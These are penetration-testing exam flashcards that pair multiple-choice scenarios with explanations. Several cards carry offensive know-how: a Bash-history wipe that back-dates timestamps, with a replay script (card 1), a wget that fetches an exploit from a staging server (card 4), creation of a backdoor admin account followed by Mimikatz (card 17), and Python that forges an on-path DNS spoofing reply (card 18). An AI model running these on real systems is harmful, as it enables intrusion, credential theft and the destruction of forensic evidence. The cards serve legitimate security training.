Test Q's Flashcards

1
Q

A penetration tester gains access to a system and establishes persistence, and then runs the following commands:

cat /dev/null > temp
touch -r .bash_history temp
mv temp .bash_history

Which of the following actions is the tester MOST likely performing?

A

Covering tracks by clearing the Bash history

The tester is covering tracks by emptying the Bash history while keeping its timestamps intact. “cat /dev/null > temp” creates an empty file named temp (it does not touch .bash_history yet). “touch -r .bash_history temp” copies the access and modification times of .bash_history onto temp, so the wipe will not show up as a freshly modified file. Finally, “mv temp .bash_history” replaces the history file with the empty, back-dated copy. The result is an empty .bash_history whose atime and mtime still look untouched, which makes it harder for incident responders to reconstruct the tester’s actions. Two caveats: the change time (ctime) is set by the kernel and cannot be back-dated from user space, so an empty history file whose ctime is far newer than its mtime is itself a red flag; and the running shell still holds its history in memory and will write it out on exit unless the tester also runs “unset HISTFILE” or “history -c”.
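As an added example that is not part of the flashcard, the Python script below replays the same three shell commands in a scratch directory and uses os.stat to show what they hide and what they leave behind. The history contents and the 30-day back-dating are constructed, the script relies on /bin/sh with coreutils (touch -r, mv), and the looks_wiped check at the end is a hypothetical responder-side heuristic, not a standard tool.

```python
"""Replay the three-command Bash history wipe and inspect the result.

Added example: the history lines, the 30-day back-dating and the
looks_wiped() heuristic are constructed for illustration."""
import os
import subprocess
import tempfile
import time

# The exact sequence from the flashcard, run inside the scratch "home".
WIPE = "cat /dev/null > temp && touch -r .bash_history temp && mv temp .bash_history"


def demo_history_wipe():
    """Run the wipe on a constructed .bash_history.

    Returns (empty, atime_mtime_preserved, ctime_is_fresh, path)."""
    home = tempfile.mkdtemp()
    hist = os.path.join(home, ".bash_history")
    with open(hist, "w") as fh:
        fh.write("whoami\nid\ncat /etc/shadow\n")  # constructed history
    old = time.time() - 30 * 86400                # pretend it is 30 days old
    os.utime(hist, (old, old))
    before = os.stat(hist)

    subprocess.run(WIPE, shell=True, check=True, cwd=home)

    after = os.stat(hist)
    empty = after.st_size == 0
    # touch -r copied atime and mtime, so these match the original file.
    preserved = (int(after.st_mtime) == int(before.st_mtime)
                 and int(after.st_atime) == int(before.st_atime))
    # ctime cannot be back-dated: mv set it to "now", ~30 days after mtime.
    ctime_fresh = (after.st_ctime - after.st_mtime) > 86400
    return empty, preserved, ctime_fresh, hist


def looks_wiped(path, min_gap=86400):
    """Hypothetical responder check: an empty history file whose ctime is
    much newer than its mtime is consistent with the touch -r / mv trick."""
    st = os.stat(path)
    return st.st_size == 0 and (st.st_ctime - st.st_mtime) > min_gap


if __name__ == "__main__":
    empty, preserved, ctime_fresh, path = demo_history_wipe()
    print("empty:", empty, "atime/mtime preserved:", preserved,
          "ctime fresh:", ctime_fresh, "flagged:", looks_wiped(path))
```

Running it shows the file is empty and its atime/mtime match the original, while ctime jumps to the present; that gap is what a forensic timeline would catch even though ls -l looks normal.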

2
Q

A penetration tester is explaining the MITRE ATT&CK framework to a company’s chief legal counsel.

Which of the following would the tester MOST likely describe as a benefit of the framework?

A

Understanding the tactics of a security intrusion can help disrupt them.

MITRE ATT&CK is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. The ATT&CK knowledge base is used as a foundation for the development of specific threat models and methodologies in the private sector, in government, and in the cybersecurity product and service community. With the creation of ATT&CK, MITRE is fulfilling its mission to solve problems for a safer world - by bringing communities together to develop more effective cybersecurity. ATT&CK is open and available to any person or organization for use at no charge.

3
Q

A company obtained permission for a vulnerability scan from its cloud service provider and now wants to test the security of its hosted data.
Which of the following should the tester verify FIRST to assess this risk?

A

Whether sensitive client data is publicly accessible.

When assessing the security of hosted data in a cloud environment, the first thing that should be verified is whether sensitive client data is publicly accessible. This includes checking for any misconfigurations or vulnerabilities that could allow an unauthorized person to access the data. This could be accomplished by performing web application scans, network scans, and manual testing to check for any vulnerabilities that could allow for data exfiltration or unauthorized access.

It’s also important to check whether the connection between the cloud and the client is secure, whether the client’s employees are trained properly to use the platform, and whether the cloud applications were developed using a secure SDLC, but verifying whether sensitive client data is publicly accessible should be the primary focus.

4
Q

A penetration tester ran the following command on a staging server: python -m SimpleHTTPServer 9891

Which of the following commands could be used to download a file named exploit to a target machine for execution?

A

wget 10.10.51.50:9891/exploit

The SimpleHTTPServer module (Python 2; the Python 3 equivalent is python3 -m http.server 9891) serves the files in the tester’s current directory over HTTP on TCP port 9891, so any file dropped there can be fetched by a target that can reach the staging server. wget retrieves the file named exploit from that host and port and saves it under the same name on the target; it still has to be made executable (chmod +x exploit) before it can be run. 10.10.51.50 is taken to be the staging server’s address in this scenario.

5
Q

Which of the following is MOST important to include in the final report of a static application-security test that was written with a team of application developers as the intended audience?

A

Quantitative impact assessments given a successful software compromise

6
Q

A Chief Information Security Officer wants a penetration tester to evaluate the security awareness level of the company’s employees.
Which of the following tools can help the tester achieve this goal?

A

SET

The Social Engineering Toolkit (SET) is a tool that can be used by a penetration tester to evaluate the security awareness level of a company’s employees. SET provides a framework for simulating various social engineering attacks, such as phishing emails, phone calls, and other techniques. By using SET, a penetration tester can craft convincing simulated attacks to see how employees respond. This can help to identify weaknesses in employee training and develop targeted security awareness training programs.

7
Q

Which of the following is the MOST common vulnerability associated with IoT devices that are directly connected to the Internet?

A

The existence of default passwords

Consumer and industrial IoT devices commonly ship with vendor default credentials that owners never change, and when the device is exposed directly to the Internet those credentials are trivially guessable from public documentation. This is how the Mirai botnet compromised hundreds of thousands of cameras and routers: it simply tried a short list of factory usernames and passwords over Telnet.

8
Q

Which of the following describes the reason why a penetration tester would run the command sdelete mimikatz.* on a Windows server that the tester compromised?

A

To remove tools from the server

sdelete is the Sysinternals secure-delete utility: it overwrites a file’s contents before unlinking it, so the data cannot be recovered by forensic carving. Run against mimikatz.*, it securely wipes the Mimikatz binaries and related files the tester uploaded to the compromised server, which is standard post-engagement cleanup of tester artifacts. sdelete operates on files and free space only; it cannot remove a user account (that would be done with net user <name> /delete), so the command is about removing tools, not accounts.

9
Q

A penetration tester is scanning a corporate lab network for potentially vulnerable services.
Which of the following Nmap commands will return vulnerable ports that might be interesting to a potential attacker?

A

nmap 192.168.1.1-5 -PS22-25,80

The -PS option sends TCP SYN probes to the listed ports (22 through 25 and 80) as the host-discovery step, so hosts that answer on SSH, Telnet, SMTP or HTTP are marked as up and then port-scanned with Nmap’s default port list. A SYN to a listening service gets a SYN/ACK back even through stateful firewalls that drop unsolicited ACK or UDP probes, which makes it the most reliable way to find the hosts exposing these commonly attacked services. Note that -PS only controls discovery; deciding whether a discovered service is actually vulnerable still requires -sV version detection or NSE scripts.

10
Q

A penetration tester was conducting a penetration test and discovered the network traffic was no longer reaching the client’s IP address. The tester later discovered the SOC had used sinkholing on the penetration tester’s IP address.
Which of the following MOST likely describes what happened?

A

The planning process failed to ensure all teams were notified

The SOC saw the tester’s traffic as an attack and sinkholed the source IP address, which is exactly what a SOC should do with an unannounced attacker. The tester was blocked because the SOC was never told about the engagement, its source addresses or its time window; that notification is part of planning and should have been settled in the rules of engagement, along with a deconfliction contact for exactly this situation.

11
Q

An Nmap scan shows open ports on web servers and databases. A penetration tester decides to run WPScan and SQLmap to identify vulnerabilities and additional information about those systems.
Which of the following is the penetration tester trying to accomplish?

A

Identify all the vulnerabilities in the environment.

12
Q

A penetration tester wants to identify CVEs that can be leveraged to gain execution on a Linux server that has an SSHD running.
Which of the following would BEST support this task?

A

Run nmap with the --script vulners option set against the target.

The vulners NSE script takes the service and version string that Nmap identifies (so it must be combined with -sV) and looks them up in the Vulners database, returning the matching CVE identifiers with CVSS scores and flagging entries that have public exploits. Against a host with SSHD listening, this quickly narrows down which CVEs affect the detected OpenSSH version and could give remote code execution. It is a version-based lookup rather than an exploitation check, so its results are candidates that still need manual validation before being reported.

13
Q

A penetration tester completed a vulnerability scan against a web server and identified a single but severe vulnerability.
Which of the following is the BEST way to ensure this is a true positive?

A

Perform a manual test on the server.

14
Q

A penetration tester has been given eight business hours to gain access to a client’s financial system.
Which of the following techniques will have the HIGHEST likelihood of success?

A

Performing spear phishing against employees by posing as senior management

15
Q

A company’s Chief Executive Officer has created a secondary home office and is concerned that the WiFi service being used is vulnerable to an attack. A penetration tester is hired to test the security of the WiFi’s router.
Which of the following is MOST vulnerable to a brute-force attack?

A

WPS

Wi-Fi Protected Setup authenticates an external registrar with an eight-digit PIN, but the protocol confirms each half of the PIN separately and the last digit is a checksum, so an attacker needs at most about 11,000 guesses instead of 10^8; tools such as Reaver automate the attack against routers that do not lock out after failed attempts. A WPA2 network with a strong passphrase is not practically brute-forceable, so WPS is the weak point and should be disabled on the router.

16
Q

A penetration tester writes the following script:

for x in $(seq 1 254); do
    ping -c 1 10.10.1.$x
done

Which of the following objectives is the tester attempting to achieve?

A

Determine active hosts on the network

The loop sends a single ICMP echo request to every address from 10.10.1.1 to 10.10.1.254; the hosts that reply are live. This is a ping sweep, equivalent in purpose to nmap -sn 10.10.1.0/24, though slower because each ping waits for its timeout before the next address is tried, and it misses hosts that drop ICMP.

17
Q

A penetration tester ran the following commands on a Windows server:

schtasks
echo net user svsaccount password /add >> batchjopb3.bat
echo net localgroup Administrators svsaccount /add >> batchjopb3.bat
net user svsaccount
runas /user:svsaccount mimikatz

Which of the following should the tester do AFTER delivering the final report?

A

Remove the tester-created credentials.

The tester listed the scheduled tasks, wrote a batch file that creates a new local user (svsaccount) with the password “password” and adds it to the local Administrators group, confirmed the account exists, and then ran Mimikatz as that user to extract clear-text passwords, hashes and other credential material. After delivering the final report, the tester should remove the tester-created credentials by running “net user svsaccount /delete”, which removes the account and its group membership, and should also delete batchjopb3.bat, since it contains the plaintext password and would recreate the backdoor account if anyone ran it.

18
Q

A penetration tester has established an on-path attack position and must now specially craft a DNS query response to be sent back to a target host.
Which of the following utilities would BEST support this objective?

A

Scapy

Scapy is a Python packet-crafting library that builds, sends and dissects packets at any layer, so the tester can construct a DNS response byte for byte: copy the transaction ID and question section from the intercepted query, set the QR (response) flag, and supply an answer record that points the requested name at an attacker-controlled address. Because the tester is on-path, they can see the query’s transaction ID and source port, which is precisely what a resolver checks before accepting an answer, so the forged response is accepted and the target is redirected (for example to a credential-harvesting site) without the real DNS server ever being involved.
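As an added example that is not part of the flashcard, the script below does by hand what the tester would do with Scapy (roughly DNS(id=q.id, qr=1, qd=q.qd, an=DNSRR(...)) layered under IP/UDP): it parses a captured query, reuses its transaction ID and question, and emits a spoofed A record. It uses only the Python standard library so it runs without Scapy and without a network; the query, the domain bank.example.com and the TEST-NET address 203.0.113.7 are constructed, and resolver_accepts is a simplified model of the checks a stub resolver makes.

```python
"""Craft an on-path DNS response that a resolver will accept.

Added example using only the standard library. Names, transaction IDs
and addresses are constructed; nothing here is sent on the wire."""
import struct


def encode_name(name):
    """Encode a dotted name as DNS labels."""
    out = b""
    for label in name.rstrip(".").split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def build_query(txid, name, qtype=1):
    """Minimal DNS query (one question, RD set) for `name`; qtype 1 = A."""
    header = struct.pack(">HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack(">HH", qtype, 1)


def parse_question(data):
    """Return (txid, flags, qname, qtype, qclass, raw_question) from a
    message carrying exactly one uncompressed question."""
    txid, flags, qdcount = struct.unpack(">HHH", data[:6])
    if qdcount != 1:
        raise ValueError("expected exactly one question")
    pos, labels = 12, []
    while True:
        length = data[pos]
        pos += 1
        if length == 0:
            break
        if length & 0xC0:
            raise ValueError("compression pointer in question not supported")
        labels.append(data[pos:pos + length].decode("ascii"))
        pos += length
    qtype, qclass = struct.unpack(">HH", data[pos:pos + 4])
    return txid, flags, ".".join(labels), qtype, qclass, data[12:pos + 4]


def spoof_response(query, spoofed_ip, ttl=300):
    """Forge the answer an on-path attacker sends: same txid, same question,
    QR=1, one A record pointing at the attacker's address."""
    txid, flags, qname, qtype, qclass, question = parse_question(query)
    if qtype != 1 or qclass != 1:
        raise ValueError("only IN A queries are handled in this example")
    # QR=1, keep opcode and RD from the query, set RA, RCODE 0 (NOERROR).
    resp_flags = 0x8000 | (flags & 0x7800) | (flags & 0x0100) | 0x0080
    header = struct.pack(">HHHHHH", txid, resp_flags, 1, 1, 0, 0)
    # Answer owner name is a compression pointer (0xC00C) to the question
    # name at offset 12; TYPE A, CLASS IN, TTL, RDLENGTH 4, then the IPv4.
    rdata = bytes(int(octet) for octet in spoofed_ip.split("."))
    answer = struct.pack(">HHHIH", 0xC00C, 1, 1, ttl, 4) + rdata
    return header + question + answer


def parse_a_answer(response):
    """Decode the single A record of a response built above.
    Returns (txid, qname, ip, ttl, is_response)."""
    txid, flags = struct.unpack(">HH", response[:4])
    _, _, qname, _, _, question = parse_question(response)
    pos = 12 + len(question)
    _ptr, _rtype, _rclass, ttl, rdlen = struct.unpack(">HHHIH", response[pos:pos + 12])
    ip = ".".join(str(b) for b in response[pos + 12:pos + 12 + rdlen])
    return txid, qname, ip, ttl, bool(flags & 0x8000)


def resolver_accepts(query, response):
    """Simplified stub-resolver acceptance test (RFC 5452 style): the
    transaction ID must match, the question must be echoed, and QR must be
    set. The UDP source/destination port check is not modelled here; an
    on-path attacker sees those too, which is why blind spoofing is hard
    but on-path spoofing is easy."""
    q_txid, _, _, _, _, q_question = parse_question(query)
    r_txid, r_flags, _, _, _, r_question = parse_question(response)
    return q_txid == r_txid and q_question == r_question and bool(r_flags & 0x8000)


if __name__ == "__main__":
    q = build_query(0x1337, "bank.example.com")       # constructed query
    r = spoof_response(q, "203.0.113.7")               # attacker's address
    print(parse_a_answer(r), resolver_accepts(q, r))
```

The resolver_accepts check is the reason the attack needs an on-path position: a blind attacker would have to guess the 16-bit transaction ID and the source port, while the on-path tester simply copies them from the query they intercepted.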

19
Q

A penetration tester is starting an assessment but only has publicly available information about the target company. The client is aware of this exercise and is preparing for the test.
Which of the following describes the scope of the assessment?

A

Unknown environment testing

20
Q

A consulting company is completing the Rules of Engagement (ROE) during scoping.
Which of the following should be included in the ROE?

A

Testing restrictions

21
Q

A new client hired a penetration-testing company for a month-long contract for various security assessments against the client’s new service. The client is expecting to make the new service publicly available shortly after the assessment is complete and is planning to fix any findings, except for critical issues, after the service is made public. The client wants a simple report structure and does not want to receive daily findings.
Which of the following is most important for the penetration tester to define FIRST?

A

Establish the threshold of risk to escalate to the client immediately.

The most important thing for the penetration tester to define first is the threshold of risk to escalate to the client immediately. The client has stated that it wants to fix any findings, except for critical issues, after the service is made public. Therefore, it’s important for the penetration tester to establish with the client the level of risk that would warrant an immediate escalation, so that the client can take action to fix the issue before the service is made public. This will help to mitigate the impact of any potential vulnerabilities on the new service and its users.

22
Q

A penetration tester logs in as a user in the cloud environment of a company.
Which of the following Pacu modules will enable the tester to determine the level of access of the existing user?

A

iam_enum_permissions

Pacu is an open-source framework for penetration testing AWS environments, organized into modules for enumeration, privilege escalation, persistence and so on. To find out what the compromised user can actually do, the tester runs iam_enum_permissions, which enumerates the IAM policies attached to the current user (and the groups it belongs to) and compiles the resulting allowed and denied actions, so the tester can see which AWS API calls are available before choosing the next step.

23
Q

A company becomes concerned when the security alarms are triggered during a penetration test.
Which of the following should the company do NEXT?

A

Deconflict with the penetration tester

24
Q

A penetration tester has been hired to perform a physical penetration test to gain access to a secure room within a client’s building. Exterior reconnaissance identifies two entrances, a WiFi guest network, and multiple security cameras connected to the Internet.
Which of the following tools or techniques would BEST support additional reconnaissance?

A

Shodan

Shodan is a search engine for Internet-connected devices. It indexes the banners of services exposed to the Internet, so the tester can search by the client’s IP ranges or organization name and learn the make, model, firmware and sometimes the live web interface of the security cameras identified during exterior reconnaissance, along with any other exposed devices. Knowing the camera model tells the tester whether default credentials or known weaknesses apply and where the cameras’ blind spots are, all of which feeds directly into planning the physical entry.
Wardriving only detects wireless access points, Aircrack-ng is for cracking Wi-Fi keys, and Recon-ng is an OSINT framework oriented toward web and people reconnaissance; none of them adds information about the Internet-connected cameras the way Shodan does.

25
Q

A red team gained access to the internal network of a client during an engagement and used the Responder tool to capture important data.
Which of the following was captured by the testing team?

A

User hashes sent over SMB

Responder poisons LLMNR, NBT-NS and mDNS name resolution on the local network segment: when a host looks up a name that DNS cannot resolve (a mistyped share, a stale drive mapping), Responder answers with the tester’s IP address, and the victim then tries to authenticate to the tester’s rogue SMB (or HTTP, LDAP and other) listener. What the team captures is the NetNTLMv1/v2 challenge-response, not the plaintext password; it can be cracked offline to recover the password or relayed with a tool such as Impacket’s ntlmrelayx to hosts where SMB signing is not enforced.

26
Q

A penetration tester conducts an Nmap scan against a target and receives the following result:

Port State Service
1080/tcp open socks

Which of the following should the tester use to redirect the scanning tools using TCP port 1080 on the target?

A

ProxyChains

ProxyChains forces the TCP connections of another program through one or more proxies by hooking connect() with LD_PRELOAD. Here the target exposes a SOCKS proxy on TCP/1080, so the tester adds a socks4 or socks5 entry for that host and port to proxychains.conf and prefixes the scanning tool with proxychains; the scans then originate from the target and can reach whatever internal networks it can see. Because SOCKS only carries full TCP connections, Nmap must be run with connect scans and no host discovery (-sT -Pn); SYN scans, ICMP pings and UDP probes either bypass the proxy or fail. The open port alone does not prove the proxy will accept the tester’s connections, so that should be confirmed before relying on it.

27
Q

A penetration tester who is doing a security assessment discovers that a critical vulnerability is being actively exploited by cybercriminals.
Which of the following should the tester do NEXT?

A

Reach out to the primary point of contact

Evidence that a third party is actively exploiting the client is an emergency, not a finding to hold for the report. The tester should immediately notify the primary point of contact named in the rules of engagement, who is responsible for starting the client’s incident response and bringing in the other stakeholders (the incident response team, legal, IT and management). The tester should not try to clean up, block or otherwise interfere with the attackers’ access, since that is outside the authorized scope and would destroy evidence the responders need.

28
Q

A penetration tester received a .pcap file to look for credentials to use in an engagement.
Which of the following tools should the tester utilize to open and read the .pcap file?

A

Wireshark

29
Q

A penetration tester ran an Nmap scan on an Internet-facing network device with the -F option and found a few open ports. To further enumerate, the tester ran another scan using the following command: nmap -O -A -sS -p- 100.100.100.50
Nmap returned that all 65,535 ports were filtered
Which of the following MOST likely occurred on the second scan?

A

A firewall or IPS blocked the scan.

The first scan with -F touched only the 100 most common ports and drew no attention. The second scan swept all 65,535 ports with OS detection and -A’s version detection and scripts, a far noisier pattern that an IPS recognizes as a port scan; once the tester’s source address was blocked, every probe was dropped and Nmap reported all ports as filtered, including the ones the first scan had found open.

30
Q

A penetration tester is looking for a vulnerability that enables attackers to open doors via a specialized TCP service that is used for a physical access control system. The service exists on more than 100 different hosts, so the tester would like to automate the assessment. Identification requires the penetration tester to:
✑ Have a full TCP connection
✑ Send a hello payload
✑ Wait for a response
✑ Send a string of characters longer than 16 bytes

Which of the following approaches would BEST support the objective?

A

Create a script in the Lua language and use it with Nmap Scripting Engine (NSE).

An NSE script can do each required step with the nmap socket library: open a full TCP connection, send the hello payload, wait for and read the response, then send the over-length string and record how the service reacts. Nmap’s host engine then runs that script against all 100+ hosts in parallel and collects the results in one report, which is what makes it a better fit than hand-crafting probes per host or forcing the check into a tool that only matches banners.

31
Q

Performing a penetration test against an environment with SCADA devices brings an additional safety risk because the:

A

devices may cause physical world effects.

SCADA devices control physical processes, so an action that is harmless on an IT network (a port scan, a malformed packet, a fuzzed request) can open a valve, start or stop a pump, or crash a PLC that is holding a process in a safe state. Many of these controllers also run fragile, unpatched network stacks. For that reason they need to be treated with particular care during penetration testing: passive discovery rather than active scanning where possible, testing against spares or in maintenance windows, and explicit agreement with the plant operators before any device is touched.